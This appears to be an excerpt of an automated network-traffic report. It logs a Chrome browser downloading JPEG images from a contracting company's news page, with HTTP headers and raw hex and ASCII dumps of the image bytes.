                                              2024-09-27 06:20:24 UTC8000INData Raw: c5 e6 60 5d 85 a7 49 a6 b1 6f a9 b0 e9 d6 11 6b 7a c5 65 ca cb 9a dc f9 89 dd b6 70 6e 8d ce 5e 55 5d c5 bb 2c 6f 33 90 a9 ce 29 55 a4 da 8b 6b e7 05 12 cf 4b 89 09 fd 25 cc ca 72 88 12 95 81 f5 f6 52 d6 bc 12 db 19 9a d7 fd 65 2a 40 66 71 6e b1 2a be 4a 5e e0 e7 da e7 31 1f 84 5c ce f0 92 4e 93 97 4e db eb 0b 35 ce c2 71 4b 6d 19 d7 2b 7b bd 27 71 8a ac 96 d8 cd 75 96 97 84 e8 39 c7 41 77 fd 21 53 b7 63 66 bc f0 ed d6 61 5d 2a 2e 21 3f c5 86 e2 32 59 93 89 3e 69 c3 38 6f 00 a6 78 cd fa 42 75 8a 5f 2b b7 a4 a3 91 5d 6d 78 6f a1 df 94 d6 f0 e7 b9 8c fa 4e e9 c6 ba 19 dd d1 ca 0d f3 6d e5 14 b1 66 d9 66 76 27 ac 39 6f 0c 31 8a 6a 7d 26 b1 ab 14 40 6c a0 71 40 a4 e5 3a 4b c6 7d 40 b4 09 b8 94 c2 d3 27 73 cf a4 a9 45 32 d4 e2 57 d0 34 65 ae a5 5a c0 ee 39 4a
                                              Data Ascii: `]Iokzepn^U],o3)UkK%rRe*@fqn*J^1\NN5qKm+{'qu9Aw!Scfa]*.!?2Y>i8oxBu_+]mxoNmffv'9o1j}&@lq@:K}@'sE2W4eZ9J
                                              2024-09-27 06:20:24 UTC8000INData Raw: f8 5f 90 fc 99 ff 00 a5 c1 ff 00 35 79 af 1a 45 6f b7 3d 08 5f c7 85 95 63 db 37 e8 8a 32 4b d5 42 22 72 54 08 db 93 d7 48 b9 a5 66 a6 45 c7 51 50 c3 7e 5d 7c 6c 01 92 c7 fc a0 c0 00 68 08 55 55 fd 10 e8 7e 89 4e 8f 19 99 99 ee 67 bf 19 ed 97 33 dc 2f b9 9e fc 1f 33 3d cc f7 e2 bc 53 db e6 a5 4a 95 03 c5 4a 95 03 c1 2a 66 04 09 52 a5 4a f1 5f 85 4a f2 ca 89 2a 54 e6 f5 97 08 79 3c 0f e1 ab f1 1d 23 d0 fe 63 e1 8f e2 78 1f c4 49 fe fb a3 fe 6b fc 2a 3a 8c 57 6b fb 95 0f 43 fa f0 92 92 9b 33 29 d0 b1 5c 5e 00 46 02 65 cb b5 df 37 13 a4 d7 58 41 91 98 9c 10 25 4a 8e 97 a8 b4 de 6d 2b 2f 83 c8 4a 95 2a 54 a9 50 3f 0a 81 2b cd 4a 95 02 54 af 35 2b c1 2b f0 af 24 a9 5e 2a 57 8a 95 e2 bf 1b fc 2a 2b c0 fe fc 5f 82 10 7c 1e 33 c1 98 02 61 33 8b 8d 0f 71 31 7e d1
                                              Data Ascii: _5yEo=_c72KB"rTHfEQP~]|lhUU~Ng3/3=SJJ*fRJ_J*Ty<#cxIk*:WkC3)\^Fe7XA%Jm+/J*TP?+JT5++$^*W*+_|3a3q1~
                                              2024-09-27 06:20:24 UTC8000INData Raw: 66 00 9d ac 2f b0 64 a1 b3 a8 6d 2a e4 1c f9 3e e0 3b bd 0e 11 0a 25 61 1a b0 e9 a8 23 0b fb dc 33 0b d3 4c 01 18 76 f6 bb 85 51 40 62 18 54 98 de 2c 99 42 ef a9 66 e5 60 7c c0 57 19 5e 15 9a b1 7d 1e fe 19 5d 22 7a 1c c2 62 a8 ca b0 c2 e5 0a 9b a9 5e 82 56 30 08 8d 87 b9 65 8e 5b 69 8a a0 00 e2 13 20 1a 73 f7 0a a1 6c 2a 2d c0 1c 01 2e 05 ea 1e 63 06 69 c4 03 42 f1 00 a2 ac c6 08 34 a0 95 fb 01 ab 6a 6e 50 63 47 68 11 56 cc 7e 06 02 a8 73 08 8e 6b 57 07 ea 0d cc 6e 85 e0 7d 66 06 e5 b0 1e 7d c6 97 f8 19 c6 15 c0 ca 62 8d 5e 53 94 42 cd 86 a0 d7 c0 33 5c b2 ca c3 a8 bb 35 1f 4d cd aa a4 81 80 1f 39 0e a2 39 77 6b a3 f4 4b d5 1d e8 85 64 20 ea e3 0b be 0f 4c 05 3d 4c 3c 02 5d 52 db 41 7b 4d b7 0f 0a c3 6e ea 14 5c b1 4e 63 a0 eb 25 f8 42 f6 41 d8 b0 4b 01
                                              Data Ascii: f/dm*>;%a#3LvQ@bT,Bf`|W^}]"zb^V0e[i sl*-.ciB4jnPcGhV~skWn}f}b^SB3\5M99wkKd L=L<]RA{Mn\Nc%BAK
                                              2024-09-27 06:20:24 UTC8000INData Raw: 4b dc 66 05 0d 46 71 d9 18 2f 2c a8 30 6f 31 7d c8 6a d9 18 22 18 c6 74 4a 6c 8a e2 0e 97 2c 73 55 1a e0 1f 78 8d 23 07 6d ca ab 5e 89 a1 96 11 33 83 70 08 c2 2b 1a 52 8d 67 e2 5c ad f8 4f c3 18 b2 61 76 c3 5e 46 0c b8 b3 13 59 f0 b9 70 30 65 fa f1 53 6c 4a f7 90 f8 dc 62 24 b4 24 83 c3 68 43 e3 20 46 a6 de 2f 84 f0 f8 41 86 c1 aa e6 05 3f 33 1d 91 cb 4a 4e 60 b7 a0 80 93 14 42 4f b2 6c 26 a6 00 e5 95 01 5c 11 97 a0 db 0e d1 b0 e6 5f 6b 1c 4e 4a 89 02 cb c4 33 63 2a a0 49 43 bc 42 67 5d cb 81 97 15 06 1e 62 04 b7 a4 b6 aa 43 e2 e7 a0 84 33 61 19 43 54 82 f2 10 08 bb 9b a8 9d 82 f0 84 2a 53 54 7e 20 6a ab 46 9b 50 e2 6e 15 f5 2f cd 54 aa e0 cd 5a 31 02 93 8c 10 c1 56 e5 e6 1e 35 c2 4a cd 03 6e 3a 6d af 2c 54 60 8c 4b e3 5b 8a 22 29 69 35 e3 d4 2d 96 e8 f3
                                              Data Ascii: KfFq/,0o1}j"tJl,sUx#m^3p+Rg\Oav^FYp0eSlJb$$hC F/A?3JN`BOl&\_kNJ3c*ICBg]bC3aCT*ST~ jFPn/TZ1V5Jn:m,T`K[")i5-
                                              2024-09-27 06:20:24 UTC3250INData Raw: 00 01 00 02 03 11 12 21 04 10 13 22 31 20 30 40 41 32 42 50 51 14 23 05 15 33 60 71 ff da 00 08 01 03 01 01 08 00 da 6b dc 3d 09 de 8c 8c 3f aa a2 3e bb 7f d1 69 08 04 7d a3 f0 c5 cb 02 b0 2b b6 57 68 a1 19 5d b5 db 6a c1 88 08 97 fa d6 4c 5d c6 0f 5d d5 de 7a ee 3d 19 1e b3 2b 2f ab fb be d3 6b 7f 00 69 09 08 42 42 8b 98 7d db 16 41 66 17 75 77 0a ee 3d 77 0d 2c dc b2 2a fe eb f7 7d a6 d6 fe 77 f7 63 e8 fe ef b4 da df f0 25 0f a2 3e d3 6b 7f c0 94 3e 88 fb 4d ad ff 00 02 50 fa 23 ed 2b a5 7f 09 90 59 b1 77 23 41 ed 77 e9 fb 0c 96 4b 25 92 c9 65 f1 a5 5d 2b ed 2d 5a b5 6a d5 ab 56 ad 5a 9a 49 0b dd 8b 5f 26 5e 53 3f 23 e1 52 2e 10 a6 39 5a 25 05 6a d5 ab 56 ad 5a b5 6b 25 6a d5 fc 77 f6 54 55 2a 54 a9 52 a5 4a 95 2a 58 aa 54 b0 58 2c 16 0a 96 09 cd d2 3f
                                              Data Ascii: !"1 0@A2BPQ#3`qk=?>i}+Wh]jL]]z=+/kiBB}Afuw=w,*}wc%>k>MP#+Yw#AwK%e]+-ZjVZI_&^S?#R.9Z%jVZk%jwTU*TRJ*XTX,?


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              140192.168.2.465477173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:24 UTC715OUTGET /uploads/news/10/610a9221fa6b94cfeb442620ff5d49ea.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/news
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:24 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:24 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:42:10 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 79278
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:24 UTC7931INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 02 80 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff da 00 08 01 01 00 00 00 00 f2 c0 10 40 14 40 00 50 00 00 00 00 00 00 00 50 14 01 50 01 41 55 55 54 05 05 15 40 14 15 ca 28 aa 02 82 8a 0a a2 8a a2 8a 38
                                              Data Ascii: JFIF''#*" "*#>1++1>H<9<HWNNWmhm''#*" "*#>1++1>H<9<HWNNWmhm"@@PPPAUUT@(8
                                              2024-09-27 06:20:24 UTC8000INData Raw: 2d 6c 99 81 3a f5 b2 5b 9c cc ce be 69 ab 75 74 ab 6d e7 95 4c db 90 32 d0 29 67 30 8e e8 bb cd 2d d6 40 12 12 4c cb 12 9a 12 a6 74 22 65 2a c3 ad 94 0b a8 ce b0 ac de 92 4c b5 08 22 d0 24 13 19 62 6a eb 48 eb a0 25 18 77 93 2c ba b9 a3 54 96 05 45 cd 49 26 4e 57 a5 a2 eb 50 09 49 9b da 4c 23 ae 71 62 d3 36 d2 28 84 66 4e 58 e9 d2 d4 a9 9d 74 04 15 87 79 89 13 ae 20 b6 5d 10 94 4c 91 13 33 13 ae ea 09 6e a8 45 99 7a 31 88 4e 98 0b 6d 81 52 59 15 22 59 8c e7 13 a7 65 b9 96 1a d5 06 2f 4c 40 a9 63 72 80 a9 04 40 48 c6 26 3a 75 d5 49 19 5d 6e 99 58 24 42 3b 08 14 22 c4 a8 90 66 67 52 74 d6 ac ce 46 6e ac 67 24 92 66 97 d4 52 84 a8 03 29 05 2c ac 5d 6b 53 38 46 73 28 93 08 ba dc f5 54 50 10 08 49 64 68 29 33 74 ba 98 91 24 cc 65 66 9b b7 ff c4 00 1a 01 01 01
                                              Data Ascii: -l:[iutmL2)g0-@Lt"e*L"$bjH%w,TEI&NWPIL#qb6(fNXty ]L3nEz1NmRY"Ye/L@cr@H&:uI]nX$B;"fgRtFng$fR),]kS8Fs(TPIdh)3t$ef
                                              2024-09-27 06:20:25 UTC8000INData Raw: ce ed 29 96 68 58 eb d7 6a ef 5d d8 9f 7f 8a de 5b 7a 47 ca 5a 7c e5 97 eb 0f dc 2a dd 0b ac b2 ce 63 ba 44 d4 24 6e a9 51 d8 ef b1 ba cb 44 8e 14 e4 8e 2b 7b 02 d0 8c 8f 5d 68 61 60 a8 15 18 65 42 a5 6d c9 a6 1f da 0f ba a8 67 b6 81 b1 89 a2 e8 01 69 73 e6 7e d2 b1 7c e1 bd 0e fb a5 1c d4 7e 69 ca 3e 4a 19 a6 4e 08 e3 2d 63 37 a3 25 72 43 80 70 69 8f 9a 47 ed 8e e2 b4 67 9a 9f da 6f c5 09 a3 92 17 96 d6 81 ca c1 24 52 5a 61 2c 27 6d 6a 29 b3 e5 19 b5 5b 61 fc e6 39 7e 81 1d 9f ea 9a 49 07 a5 68 a3 80 e8 7f df f1 01 41 e5 17 12 89 e0 8f 6a b5 d7 c2 27 dd 51 dc 11 2b 44 9f 24 ee 86 f7 70 dd af f3 3d 89 bc 97 f4 2a 71 1b ed 29 33 67 b5 f0 4d ca 5e 86 f7 a0 3c 9b b7 e3 dc 98 a1 e5 4f f5 9f e5 0a c9 8c 93 9f a5 4f f1 39 58 f0 8e cf d3 29 f7 a7 91 e1 50 8f a0
                                              Data Ascii: )hXj][zGZ|*cD$nQD+{]ha`eBmgis~|~i>JN-c7%rCpiGgo$RZa,'mj)[a9~IhAj'Q+D$p=*q)3gM^<OO9X)P
                                              2024-09-27 06:20:25 UTC8000INData Raw: e9 8c fa 97 77 84 10 e1 39 1e 85 69 d7 eb 8d d7 4d 4b ad e4 da 18 d1 96 e3 92 88 49 aa 96 f9 93 23 cb 9d a7 66 c2 32 5a b3 b4 b8 f4 db 1a b4 45 35 1f fd ef ed de ad be 0f ad 1a c7 58 eb 77 f4 d1 de 39 aa d8 bd 7d 1b ff 00 61 56 c9 eb e8 ff 00 ee c5 5e b2 fa f6 0f ee ae 56 22 cd 43 ae 18 88 a9 f3 71 ea c7 61 45 15 2f 22 9b e8 3a 96 92 d4 ba 17 0a d9 f0 95 a0 89 49 a0 20 1d ca ec 5e b6 8b ed 72 ba cf 5f 45 fb ff 00 05 c4 fd 66 8a fd 93 f8 2d 24 ef 34 2b 16 03 ec f5 28 a5 0c 60 fc f2 c6 df fa 75 3d c9 d6 9f ff 00 25 0f 54 5f b9 78 61 ff 00 e6 0f 54 2a 3b 65 e9 18 df ca d2 3a ae 1c 5d 55 2b cc a6 d6 eb 5e 24 d8 78 bd 1c f4 f1 06 63 a7 c5 2b 49 61 6d 9f eb 1d de b6 9f 16 d5 c8 67 d6 b3 bd 5a 2c ad b3 da a6 7d 43 59 2b 5f 4a e5 54 fa 3a 80 3d b8 73 a8 6e b1 e1
                                              Data Ascii: w9iMKI#f2ZE5Xw9}aV^V"CqaE/":I ^r_Ef-$4+(`u=%T_xaT*;e:]U+^$xc+IamgZ,}CY+_JT:=sn
                                              2024-09-27 06:20:25 UTC8000INData Raw: 92 3a 17 82 37 1e 3b 8a 65 94 37 1b ee af 57 e0 9b 04 63 2e f5 aa dd 55 3c 12 ba 17 b5 a2 a4 8a 2f 0c b2 b2 8d 92 f4 5b 06 b1 a5 a3 0e 7c 93 48 73 6f 31 d5 69 da d3 82 96 c5 65 93 97 67 8c f5 53 b9 36 c2 d8 dc 1d 14 f3 c7 43 c9 0e ab 7b 15 a6 39 1f 13 43 19 03 f8 c6 ad 93 e0 9d 65 6b 71 76 8d 9e 3f a5 03 ef a6 4f 70 dd 8b 4a c8 cf a3 2b 7e 2a 96 a9 6b 5b 35 8e d4 36 96 d0 1f 82 8a 38 1b 3c 5f ec fb 44 0f be 00 20 f1 6b cf 54 5a e0 e2 1c 29 e2 37 96 de 91 f2 36 bf 9a da 7e a9 fd ca c4 07 e5 41 51 5a 3a f0 ea 15 46 d6 40 c5 a1 5a ec 70 da a2 ba 5e eb d5 a8 73 b8 ff 00 82 7d 92 c9 2b 6e ca c7 32 e3 6e 02 d6 54 0a 6e 77 e2 a4 d0 60 9f 23 69 63 b9 b0 fc 50 d0 36 d7 3f 56 d0 dd 67 a8 5c 1a 7a ab 9a 76 85 d2 30 bd ba cb 0c a4 03 88 02 b5 eb 09 b3 68 40 69 26 89
                                              Data Ascii: :7;e7Wc.U</[|Hso1iegS6C{9Cekqv?OpJ+~*k[568<_D kTZ)76~AQZ:F@Zp^s}+n2nTnw`#icP6?Vg\zv0h@i&
                                              2024-09-27 06:20:25 UTC8000INData Raw: 06 fe 0e a5 d4 80 72 73 43 b0 70 af 4a 7d 96 ca fc e3 15 d9 45 2e 8d b3 3b 10 e7 b4 ef 42 c9 3d 92 60 ec 24 61 14 ae 44 2b e1 c6 80 21 5d 65 06 c5 7d f5 20 8c 4a 64 b1 dd e3 b5 ee 3c ee fc 4a 7b 6f 9b c0 c4 cf b5 f8 20 ea 32 ae 97 b2 ff 00 c2 8a 37 b1 ef a5 d8 9a 37 91 f8 95 2b 63 b8 eb 8f 63 8e e6 b0 2b 2b 26 8f 1b 94 e9 61 56 99 58 ea 09 5e ee 86 81 f8 ab 3c 64 b2 b1 02 1b ce 47 fe 2a d3 ae 88 b0 99 4e 27 20 50 96 12 31 8a be d5 3f cc 53 c0 36 8b ec 96 36 8d c1 d8 fb 93 a9 77 6d 77 1b e7 f0 50 cb 49 4b 5e c8 e3 a7 d1 03 bd 4c f8 e4 8d c0 4e 4e 1b 3f 72 b2 ba d0 c6 dc b8 40 e7 69 56 8b 86 86 6b e2 9b ae 85 11 7b da 2e 17 5d e7 75 3b 82 b4 89 21 73 1f 7d d7 49 c4 54 a6 ea dc 03 84 18 1d b4 6f c5 08 b5 72 3d c2 46 b5 ae d9 7e 8a e0 70 c4 17 7d a7 b8 28 9c
                                              Data Ascii: rsCpJ}E.;B=`$aD+!]e} Jd<J{o 277+cc++&aVX^<dG*N' P1?S66wmwPIK^LNN?r@iVk{.]u;!s}ITor=F~p}(
                                              2024-09-27 06:20:25 UTC8000INData Raw: a9 52 a5 74 a9 52 a5 4a 95 2a 54 a9 52 a5 4a 95 d7 4f fc 82 c8 72 b8 4f 86 5c d7 6f ad 89 8d 5e 8f 38 f4 56 9f 84 c1 45 c7 c6 21 d0 81 08 6d 0e 8a ff 00 8a a4 55 ec 6e a9 06 cd ca 73 2f 76 88 bd 68 25 7e 2c ca 5a ac 78 44 4a a1 57 29 c6 20 04 02 80 50 1d 8f cd 21 d1 9f ca e6 32 a2 7f f2 c9 bf b2 57 0c b4 4a b9 02 d5 20 2e 87 78 f7 7c 20 50 6a 1d 53 0c e2 29 21 cd 10 ea ea 88 8c d9 bd a4 11 62 46 0d 8a 9a 26 5e 54 b9 0d 69 81 19 70 89 42 dc 5b 07 c2 50 a5 80 78 b0 cc 4c 00 dd 1b a5 cd ff 00 0d 8f 06 ae 20 16 cc f2 4f e6 84 45 6a fa 35 8e 08 64 46 57 26 bf e2 69 26 16 a0 12 d0 76 65 42 39 3f 27 43 a6 d3 f0 49 53 2c ea c4 77 8a 6c 92 1d 98 f7 8c 67 d8 62 5c 0d 16 f8 8e 24 ea b4 d0 3b 33 39 ea e0 9f 11 9f e4 2c fa 03 ff 00 49 f2 9b fd 28 19 f5 6e da 8c bc 26
                                              Data Ascii: RtRJ*TRJOrO\o^8VE!mUns/vh%~,ZxDJW) P!2WJ .x| PjS)!bF&^TipB[PxL OEj5dFW&i&veB9?'CIS,wlgb\$;39,I(n&
                                              2024-09-27 06:20:25 UTC8000INData Raw: 9c 17 ad 1a e0 33 ad e0 75 21 69 6f 4e e9 cf c4 25 8f b8 0c 0c ae 05 a7 ad fe 31 ff 00 8e e2 86 9e ba 7d ce 0c 40 d5 95 67 8e 31 c4 23 37 68 22 be 55 44 aa d6 c3 ff 00 39 ab 51 f2 4b ba 9e d3 5d d4 ed 71 2a 4a 5b e2 d7 9f 25 df 5a 87 db 7d c7 a3 d5 ef 0f bd a3 f3 bf 83 15 2f 1f 29 8f 27 b2 b5 10 59 8b ac b1 62 98 de 05 31 02 69 dc 97 4f 70 d9 93 13 94 3d f3 64 fe fe d8 34 18 6d 21 81 37 37 90 16 3a 5f e2 d9 86 b4 33 04 1c cc d8 6a 03 37 1f 0c 18 4c 21 34 9d fa 4a e0 4a 2b ca b1 2d 53 da e3 b7 e7 e5 13 7f c1 68 b5 8f 02 77 67 34 0c 3d 19 f8 66 22 2e 85 e5 c4 5c ae 3e b4 b8 4e c9 f6 5d 58 1b 74 8e 72 ec b3 a0 a9 21 dc 0b 92 ac b4 4c 97 86 cd 2f 1f fc 40 43 5f c7 2b f1 ca 8d e4 1f 85 e0 a9 91 a8 1b 10 72 0b dd 30 99 b4 bb 74 2d 74 ba c5 52 c5 01 b0 a1 e9 2c
                                              Data Ascii: 3u!ioN%1}@g1#7h"UD9QK]q*J[%Z}/)'Yb1iOp=d4m!77:_3j7L!4JJ+-Shwg4=f".\>N]Xtr!L/@C_+r0t-tR,
                                              2024-09-27 06:20:25 UTC8000INData Raw: 4e b3 02 54 0c 6c 1a 94 b5 2a d4 77 0e 0f 0a 88 cc e7 09 40 77 32 f5 21 5a 81 97 ff 00 4d e6 92 dc 17 77 71 85 71 ac 09 47 d7 7f 46 34 b3 34 aa de f8 3d 18 f2 48 d7 ec a2 07 1e ea 41 b5 5f 91 72 19 58 4e e1 b4 bd 03 cf 32 37 96 28 63 66 0a 1a 44 61 14 5a dc fa 85 ab 0e 4f 61 d4 89 c0 c7 2a 5a f0 ca 2c 1b e1 8b 57 06 a0 cb d6 56 05 de b0 bd 52 bd c8 9b 3e d6 fe 22 ae 9e e8 5e b7 53 bb 3f 11 b9 9b 34 45 6b 01 4b 29 97 dd cf b4 54 01 c8 ac af 41 f1 29 cb 5d d0 35 a1 f3 0d b1 f5 f7 28 33 fe 93 3e 3d 3a 81 ac 5b 31 21 b2 13 d7 54 dc 6c 65 3d 8f f2 16 2c 31 4a d6 4c 84 20 19 9c 1e e9 5f 17 1d e6 fa bd 91 d0 aa 27 bd 46 2e 54 08 5b 29 ad af 6c c0 56 e0 af b5 c4 56 4b 6e f7 1e 61 b5 ce ef 5b a8 f9 d8 8a ed 05 a5 07 51 c7 51 95 41 e2 b3 00 9a 5b 06 a7 89 78 70 15
                                              Data Ascii: NTl*w@w2!ZMwqqGF44=HA_rXN27(cfDaZOa*Z,WVR>"^S?4EkK)TA)]5(3>=:[1!Tle=,1JL _'F.T[)lVVKna[QQA[xp
                                              2024-09-27 06:20:25 UTC7347INData Raw: ca 45 4d 42 46 a9 8d 6c 38 61 a1 8d 95 0f 5b 5d 37 3c 6c f8 25 86 0b 15 fd f1 0f 3d 86 64 5f 1d 01 01 a6 ca d4 87 5d 59 ae 18 30 c8 ed 14 24 0d f1 34 a1 8e 58 46 b7 14 37 0e e8 46 11 c9 59 da ea 68 17 f5 f1 04 d3 77 16 ac 1b 09 6e 1d 5c 3f e4 03 84 6d 88 bc d4 71 8f 92 a5 77 0f 92 6a a9 be 6a c8 d1 97 ee 0c a7 56 d3 c0 a6 2f 6f 99 61 37 f1 98 6e 1f 21 a9 e9 12 b6 3e a1 ac d1 75 7f d4 0f 0f 99 9e e9 9e 49 dc 7b e2 cc c4 1c 1e f7 7e 90 36 8b f1 ff 00 18 e9 81 4e b9 cf b4 55 e3 d8 96 34 11 0e 55 e4 96 82 84 f2 35 ed 06 e3 1e 28 78 d6 28 75 39 db e2 e1 45 88 f6 8a b5 72 b5 ec 94 bc 07 2d 7f 50 a3 5a 3b 98 29 81 3b 21 15 c3 44 ab e1 49 5b 51 94 0e 82 56 53 35 1b c3 22 05 f6 2a 39 6e 0e 56 50 83 4e 91 77 6a 44 5a 9d a5 00 24 ef 51 c6 40 f3 71 0b b5 62 52 ae 01
                                              Data Ascii: EMBFl8a[]7<l%=d_]Y0$4XF7FYhwn\?mqwjjV/oa7n!>uI{~6NU4U5(x(u9Er-PZ;);!DI[QVS5"*9nVPNwjDZ$Q@qbR


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              141192.168.2.465478173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:24 UTC714OUTGET /uploads/news/3/3ab20c2822ba796ca4c90a82eae00b78.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/news
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:24 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:24 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 13 Jan 2023 05:28:19 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 98044
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:24 UTC7931INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 01 07 07 07 07 08 07 08 09 09 08 0c 0c 0b 0c 0c 11 10 0e 0e 10 11 1a 12 14 12 14 12 1a 27 18 1d 18 18 1d 18 27 23 2a 22 20 22 2a 23 3e 31 2b 2b 31 3e 48 3c 39 3c 48 57 4e 4e 57 6d 68 6d 8f 8f c0 ff c2 00 11 08 02 80 04 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 02 00 01 03 04 05 06 07 08 ff da 00 08 01 01 00 00 00 00 e9 19 99 93 24 99 26 49 26 49 24 92 74 92 49 24 92 49 27 74 9c 89 95 ad 85 34 4e 39 ba 7d 95 e8 b1 78 9c ed 9a 14 19 92 49 d9
                                              Data Ascii: JFIF''#*" "*#>1++1>H<9<HWNNWmhm''#*" "*#>1++1>H<9<HWNNWmhm"$&I&I$tI$I't4N9}xI
                                              2024-09-27 06:20:24 UTC8000INData Raw: d5 2d 8d 4f 11 25 95 52 a2 12 ad c6 75 ac d4 b8 a4 ad 2e 25 4d 49 d3 7c ae 74 c7 ab 5d 4f 00 04 b4 85 33 69 4a c9 00 c5 b9 b8 9b d4 cb d7 e6 e5 89 bd eb a7 b3 4f 9c a9 64 b2 a1 a9 52 aa 52 0a 4a 23 38 cf 45 a7 6d ce 19 bd 37 d3 7a b3 e6 1a 21 a8 46 86 75 65 04 12 cb b8 5e 7c 3a 71 e9 d3 66 35 d3 5d 75 ad 66 ce 53 cc 8b 15 4c a9 14 85 d3 5a d3 38 e5 9d 6d 18 46 57 d5 d2 ef 64 5c 61 7a 3c 08 cc dc b6 25 a4 22 1b eb ad 73 cd ce 66 ee 22 74 eb 75 bb 35 2d 4c e0 d7 4d 32 f9 ab 2c 50 29 0b 33 09 4d 6b 36 5d 74 df 4a aa 58 c6 0d 74 a2 93 e6 9a 8b 2d 8d 24 49 2c b6 a4 b6 de da d9 34 aa 67 1c eb a6 e8 09 4f 99 54 d4 25 84 24 97 4d ef ad 58 b6 ae aa 67 96 17 af 40 00 0f 99 4a 24 ca db 0b d9 be ba 20 69 4c e7 8c b7 ae e8 00 00 f9 74 a4 45 db a7 4b 55 ac ad b6 8c 73
                                              Data Ascii: -O%Ru.%MI|t]O3iJOdRRJ#8Em7z!Fue^|:qf5]ufSLZ8mFWd\az<%"sf"tu5-LM2,P)3Mk6]tJXt-$I,4gOT%$MXg@J$ iLtEKUs
                                              2024-09-27 06:20:25 UTC8000INData Raw: c0 0b c3 84 20 6f 55 e1 63 b5 e1 63 ab 5e 16 35 e1 e3 dd 72 58 02 f0 ec 46 16 76 31 8a 2b 94 14 70 68 7b ae 5c 77 c9 48 60 1d d6 33 7c 3b 5c 11 98 d2 e6 3b 94 c6 2d 2b bd 2d d7 70 a9 3b 6a 54 9e d1 54 b7 e8 b5 bd a1 d4 6c aa bd 88 8d 9a 9c b9 71 a7 31 9a 5c 9a c6 e8 6a e5 c6 b4 33 98 02 d0 c5 41 32 bd 6b 65 41 47 f4 db c6 1f a6 de 2e fa ae e3 27 b1 c8 f5 3c 1f ed 4e fa cc f2 1f af 02 1d 07 19 3d d0 a8 3e b0 5d 8a 3d 4a 9b a8 50 7b 02 fc 70 3f 59 c8 f7 41 0e ca 3f ad 3f 18 ff 00 fb 0a 2f 63 38 ff 00 d8 57 e7 81 fb 96 37 d0 89 43 ee 34 e3 6e 37 b2 0b d3 6b 6d 95 ab 3b a2 4e eb ff 00 49 dd d7 75 f8 4d f6 0e 1f 84 7e e5 dc 20 7a ac 5f 6b e8 df dd 7e 90 9e ee 8b 73 d0 0d a4 be 77 ab 5a 8e 60 e7 c9 42 56 ee 16 b6 b8 ed df 80 f7 39 77 2b ee 5f 71 5f 70 47 a1 4e
